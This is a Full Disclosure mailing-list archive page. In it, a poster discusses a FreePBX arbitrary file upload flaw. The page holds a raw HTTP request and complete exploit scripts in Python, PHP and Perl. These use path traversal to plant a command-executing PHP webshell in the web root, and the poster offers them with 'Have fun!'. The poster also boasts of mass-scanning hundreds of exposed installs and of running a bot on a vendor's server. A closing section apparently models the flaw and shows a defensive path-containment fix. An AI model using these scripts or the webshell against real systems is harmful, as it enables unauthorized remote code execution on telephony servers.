Full Disclosure mailing list archives
Re: FreePBX - Module Administration Arbitrary File Upload
From: "-= Glowing Doom =-" <secn3t () gmail com>
Date: Sun, 12 Jun 2011 09:51:53 +1000
Hello. In regards to this FreePBX exploit, which I PoC'd, has anyone tried to use the PoC? If so, were you able to just access the folder WITHOUT the admin privs? I'm just a bit confused, because the PoC I did seems to have the same problem, although you can apparently access the webshell using the method described in the older PoC (which was only a month ago or so now)...

The team who released the 'admin only' PoC did not seem to do much about showing their request session header details, so I cannot see what they are reporting here :s This PoC, which I found about 1 month ago, was just the session info and header data; the person who asked me to look into it more told me it was 'working' with NO admin privs, you just have to add the line in which points to YOUR own /folder/, which can be done through manipulating the header data and config.php of the actual FreePBX. I also did a 'sweep' scan; on one range alone I found approx 400-500 of this FreePBX, all Linux...

On another note, I just found a MASSIVE RFI/RCE in almost EVERY torrent site available (actually, it was a private one). I just do not know whether to help the admin, because last time I did this (bur.st networking, reported 4 PoCs to them, was also a donating user) they BANNED me for explaining it... Is it safer to post to this list? Or contact the vendor :s It seems that when you contact vendors... another case was a he.net box, which STILL is vulnerable; the he.net admin said to me the code was 'meant to be that way', and it allowed remote injection of a shell. I tried to explain this, and they said again it was normal and not a problem; however, I then loaded a simple PHP bot, made it join IRC, then started the PID about 20 times, and the admin finally looked into it, BUT I was not thanked, not even close... lol, in fact, suspicion again. This has now happened to me about 5 times, starting from bsd-secteam in the early 2000s, about a cat command issue which allowed me to replace the master.passwd file...

Even then, I had problems explaining it to Colin Percival; he could not 'see' my PoC... yet it seems that he has patched it :s This was also a problem in Gentoo and about 3 other distros; I could even bring that up, and yes, the 'cat' command. I think because it was so simple, it was unbelievable to them... I am very confused about how/what/who to contact now, and I'm sitting on 3 MS exploits, one of which attacks their patches!! I don't know what to do!! Please offer me any advice...

Also, please look into this separate PoC for FreePBX, as it apparently is working, although I do not TRY to make people's websites screwed etc. I am happy to do a PoC, but I don't run a local webserver at the moment; I am in the midst of changing RaQs over. I am just after some help in regards to this.

Cheers,
xd / dru

On 10 June 2011 09:08, -= Glowing Doom =- <secn3t () gmail com> wrote:
Ehhhh... the PHP exploit code has some small bugs in it :P Sorry... I just woke up and should have looked... Just look at part1 and part2 :) It is pretty simple to fix... Also, when uploading, you create your own /folder/ using this method anyhow..

On 10 June 2011 08:59, -= Glowing Doom =- <secn3t () gmail com> wrote:

Hello... I wrote a PoC code for a similar bug in this application about 3 months ago... Unfortunately, I did not bother to put it on here because, well, it was nothing much.. But since this 'admin' module has appeared, I will add my codes to the thing: this needs the PBX to 'record'; not sure if an admin module is needed.. It seems to ONLY look for the recordings... Anyhow, have fun.. admin, I believe :)... Nice try to find the sploit, guys; I have only posted it on my blogs and pastebin about 400 times in the past 4 months... I guess I will put it here next time.. Here is some code for you:

-------------------------------------------------------------------------------------------------------

PoC

The HTTP request below illustrates the upload of a PHP shell:

POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data; boundary=---------------------------5991806838789183981588991120
Content-Length: 116089

-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="display"

recordings
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="action"

recordings_start
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"

../../../../../var/www/html/admin/SpiderLabs
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream

<?php /* WebShell code goes here */ ?>
-----------------------------5991806838789183981588991120--

OK SO... In Python form:

#!/usr/bin/env python3
# FreePBX recordings upload PoC (Python version).
# Usage: python3 exploit.py <host>
# Replace cookieValue / base64auth with a valid session cookie and credentials.
import socket
import sys

if len(sys.argv) != 2:
    sys.exit("usage: %s <host>" % sys.argv[0])

host = sys.argv[1]
port = 80
boundary = "---------------------------5991806838789183981588991120"
delim = "--" + boundary + "\r\n"

# Multipart body: display/action select the recordings module, usersnum carries
# the directory traversal, ivrfile is the file that gets written there.
body = (
    delim + 'Content-Disposition: form-data; name="display"\r\n\r\nrecordings\r\n'
    + delim + 'Content-Disposition: form-data; name="action"\r\n\r\nrecordings_start\r\n'
    + delim + 'Content-Disposition: form-data; name="usersnum"\r\n\r\n'
    + "../../../../../var/www/html/admin/zmeu.php\r\n"
    + delim + 'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n'
    + "Content-Type: application/octet-stream\r\n\r\n"
    + "<?php echo '<pre>' . system($_GET['CMD']) . '</pre>'; ?>\r\n"
    + "--" + boundary + "--\r\n"
)

headers = [
    "POST /admin/config.php HTTP/1.1",
    "Host: " + host,
    "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-us,en;q=0.5",
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Referer: http://" + host + "/admin/config.php",
    "Cookie: ARI=cookieValue; PHPSESSID=cookieValue",
    "Authorization: Basic base64auth",
    "Connection: close",
    "Content-Type: multipart/form-data; boundary=" + boundary,
    "Content-Length: %d" % len(body),   # computed, not the captured 116089
]
request = "\r\n".join(headers) + "\r\n\r\n" + body

s = socket.create_connection((host, port), timeout=10)
s.sendall(request.encode("latin-1"))
print(s.recv(4096).decode("latin-1", "replace"))
s.close()

and... IN PHP:

<?php
// FreePBX recordings upload PoC (PHP version).
// Usage: php exploit.php site.com
// Replace cookieValue / base64auth with a valid session cookie and credentials.
if (!isset($argv[1])) {
    echo "\n\n";
    echo "+---------------------------------------------------+\r\n";
    echo "| Usage: php exploit.php site.com                   |\r\n";
    echo "+---------------------------------------------------+\r\n";
    echo "\n\n";
    exit(1);
}

echo "\n\n";
echo "+-------------------------------------------------------------------------+\r\n";
echo "| FreePBX 2o11 Remote File Upload Exploit                                 |\r\n";
echo "| Usage: php exploit.php site.com                                         |\r\n";
echo "+-------------------------------------------------------------------------+\r\n";
echo "\n";
echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n";
$code = trim(fgets(STDIN));

$socket = @fsockopen($argv[1], 80, $errno, $errstr, 10);
if (!$socket) {
    die("[-] Couldn't connect to: " . $argv[1] . ". Operation aborted.\n");
}

$boundary = "---------------------------5991806838789183981588991120";
$delim    = "--" . $boundary . "\r\n";

// The uploaded file: a shell that runs $code when requested (PHP concatenates with '.', not '+').
$shell = "<?php echo '<pre>' . system('" . $code . "') . '</pre>'; ?>";

// part2: the multipart body. usersnum carries the traversal, ivrfile the file to write.
$part2  = $delim . "Content-Disposition: form-data; name=\"display\"\r\n\r\nrecordings\r\n";
$part2 .= $delim . "Content-Disposition: form-data; name=\"action\"\r\n\r\nrecordings_start\r\n";
$part2 .= $delim . "Content-Disposition: form-data; name=\"usersnum\"\r\n\r\n";
$part2 .= "../../../../../var/www/html/admin/xd\r\n";
$part2 .= $delim . "Content-Disposition: form-data; name=\"ivrfile\"; filename=\"shell.php\"\r\n";
$part2 .= "Content-Type: application/octet-stream\r\n\r\n";
$part2 .= $shell . "\r\n";
$part2 .= "--" . $boundary . "--\r\n";

// part1: the request line and headers; Content-Length is computed from part2.
$part1  = "POST /admin/config.php HTTP/1.1\r\n";
$part1 .= "Host: " . $argv[1] . "\r\n";
$part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\r\n";
$part1 .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$part1 .= "Accept-Language: en-us,en;q=0.5\r\n";
$part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$part1 .= "Referer: http://" . $argv[1] . "/admin/config.php\r\n";
$part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
$part1 .= "Authorization: Basic base64auth\r\n";
$part1 .= "Connection: close\r\n";
$part1 .= "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n";
$part1 .= "Content-Length: " . strlen($part2) . "\r\n";
$part1 .= "\r\n";

fwrite($socket, $part1 . $part2);
while (!feof($socket)) {
    echo fgets($socket);
}
fclose($socket);
echo "[!] Check the upload folder (/var/www/html/admin/xd) ..\n";
?>

and in Perl..

#!/usr/bin/perl
# FreePBX recordings upload PoC (Perl version).
# Usage: perl exploit.pl <Host> <Cmd>
# <Cmd> is PHP code written verbatim into shell.php, e.g. "system('id');".
# Replace cookieValue / base64auth with a valid session cookie and credentials.
use strict;
use warnings;
use IO::Socket::INET;
use Crypt::SSLeay;
use Net::SSL;

sub usage { print "perl $0 <Host> <Cmd>\n"; exit(1); }

my ($host, $cmd) = @ARGV;
usage() unless defined $host && defined $cmd;

print "[+] Connecting to host...\n";
# Plain HTTP on 80 first; fall back to HTTPS on 443.
my $sock = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $host,
                                 PeerPort => 80, Timeout => 10);
if (!$sock) {
    print "[-] Non-SSL PBX NOT HERE! Trying SSL..\n";
    $sock = Net::SSL->new(PeerAddr => $host, PeerPort => 443, Timeout => 10)
        or die "[-] SSL PBX NOT HERE!\n";
}
print "[+] Connected.. Sending Buffer\n";

my $boundary = "---------------------------5991806838789183981588991120";
my $delim    = "--$boundary\r\n";

# Multipart body: usersnum carries the traversal, ivrfile is the file written there.
my $body = $delim . "Content-Disposition: form-data; name=\"display\"\r\n\r\nrecordings\r\n"
         . $delim . "Content-Disposition: form-data; name=\"action\"\r\n\r\nrecordings_start\r\n"
         . $delim . "Content-Disposition: form-data; name=\"usersnum\"\r\n\r\n"
         . "../../../../../var/www/html/admin/xd\r\n"
         . $delim . "Content-Disposition: form-data; name=\"ivrfile\"; filename=\"shell.php\"\r\n"
         . "Content-Type: application/octet-stream\r\n\r\n"
         . "<?php " . $cmd . " ?>\r\n"
         . "--$boundary--\r\n";

my $request = "POST /admin/config.php HTTP/1.1\r\n"
            . "Host: $host\r\n"
            . "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\r\n"
            . "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
            . "Accept-Language: en-us,en;q=0.5\r\n"
            . "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
            . "Referer: http://$host/admin/config.php\r\n"
            . "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n"
            . "Authorization: Basic base64auth\r\n"
            . "Connection: close\r\n"
            . "Content-Type: multipart/form-data; boundary=$boundary\r\n"
            . "Content-Length: " . length($body) . "\r\n"
            . "\r\n" . $body;

# Method calls rather than the print/<> builtins so the Net::SSL fallback also works.
$sock->print($request);
print "[+] Sent file 'shell.php' to act as webshell ..\n";
print "[+] Buffer sent.. shell.php contains: <?php $cmd ?>\n";
while (defined(my $answer = $sock->getline)) {
    print "[!] Server reply: $answer";
}
$sock->close;
print "[!] Check the upload folder (/var/www/html/admin/xd) ..\n";

Have fun! The Perl one is a bit rough..

dru xd @ #haxNET @ EFnet (National LULZ day is here!)

And for those guys who 'exploited' it... this PoC was released like 3 months ago... What the hell are you guys on about, and where is even a HEADER showing exploitation :S Seems you have started a group but forgot to check this for previous bugs :) hehe... No matter, it is now debugged for you.
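The PoC above works because the recordings handler splices the client-supplied usersnum field into a filesystem path, so five "../" components walk out of the recordings directory and the uploaded ivrfile lands inside the web root. The following is an added illustration, not FreePBX code and not from the poster: it parses the PoC's multipart body, shows the path the flawed join produces, and contrasts it with a hardened version that validates each component and proves containment after normalisation. It assumes (the page does not say) that uploads are stored at <recordings dir>/<usersnum>/<filename>, with /var/lib/asterisk/sounds/custom as a hypothetical recordings directory; the web root /var/www/html and the form fields are the ones in the PoC request.

```python
"""Model of the upload path flaw behind the PoC.  Added illustration only:
this is not FreePBX code.  Assumed layout (not stated on the page): the
handler writes the uploaded ivrfile to <RECORDINGS_DIR>/<usersnum>/<filename>."""
import posixpath
import re

RECORDINGS_DIR = "/var/lib/asterisk/sounds/custom"  # hypothetical recordings dir
WEBROOT = "/var/www/html"                           # web root used in the PoC request
BOUNDARY = "---------------------------5991806838789183981588991120"

# Constructed request body mirroring the PoC's four form fields.
POC_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="display"\r\n\r\n'
    "recordings\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="action"\r\n\r\n'
    "recordings_start\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="usersnum"\r\n\r\n'
    "../../../../../var/www/html/admin/xd\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="ivrfile"; filename="shell.php"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n"
    "<?php echo '<pre>' . system($_GET['CMD']) . '</pre>'; ?>\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: field name -> {"filename", "data"}.
    Covers what the PoC sends: flat parts, CRLF line ends, no transfer encodings."""
    fields = {}
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):               # closing delimiter
            break
        head, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        disposition = ""
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            if key.strip().lower() == "content-disposition":
                disposition = value
        name = re.search(r'(?:^|[; ])name="([^"]*)"', disposition)
        fname = re.search(r'filename="([^"]*)"', disposition)
        if payload.endswith(b"\r\n"):             # that CRLF belongs to the next delimiter
            payload = payload[:-2]
        fields[name.group(1)] = {"filename": fname.group(1) if fname else None,
                                 "data": payload}
    return fields


def vulnerable_destination(usersnum: str, filename: str) -> str:
    """The flaw: the client-controlled usersnum is spliced into the path as-is."""
    return posixpath.normpath(posixpath.join(RECORDINGS_DIR, usersnum, filename))


def safe_destination(usersnum: str, filename: str) -> str:
    """Hardened form: validate each component, then prove containment."""
    if not re.fullmatch(r"[0-9]{1,10}", usersnum):          # extension numbers only
        raise ValueError("usersnum must be numeric")
    base = posixpath.basename(filename)
    if base != filename or not base.lower().endswith((".wav", ".gsm")):
        raise ValueError("filename must be a bare name with an audio extension")
    dest = posixpath.normpath(posixpath.join(RECORDINGS_DIR, usersnum, base))
    if posixpath.commonpath([dest, RECORDINGS_DIR]) != RECORDINGS_DIR:
        raise ValueError("destination escapes the recordings directory")
    return dest


def lands_in_webroot(path: str) -> bool:
    """True when a file written at `path` is reachable through the web server."""
    return posixpath.commonpath([posixpath.normpath(path), WEBROOT]) == WEBROOT


if __name__ == "__main__":
    fields = parse_multipart(POC_BODY, BOUNDARY)
    num = fields["usersnum"]["data"].decode()
    name = fields["ivrfile"]["filename"]
    dest = vulnerable_destination(num, name)
    print("vulnerable handler writes", dest, "-> in web root:", lands_in_webroot(dest))
    try:
        safe_destination(num, name)
    except ValueError as err:
        print("hardened handler rejects:", err)
    print("legitimate upload goes to", safe_destination("201", "greeting.wav"))
```

The containment check is the part that matters: an allowlist on usersnum alone would already stop this PoC, but normalising the final path and comparing it against the recordings directory also catches any future component that is spliced in unvalidated, and it is what to look for when auditing an upload handler for the same class of bug.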
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- FreePBX - Module Administration Arbitrary File Upload Tiago Ferreira (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload Tyler Borland (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload Tiago Ferreira (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload -= Glowing Doom =- (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload -= Glowing Doom =- (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload -= Glowing Doom =- (Jun 11)
- Re: FreePBX - Module Administration Arbitrary File Upload Tiago Ferreira (Jun 09)
- Re: FreePBX - Module Administration Arbitrary File Upload Tyler Borland (Jun 09)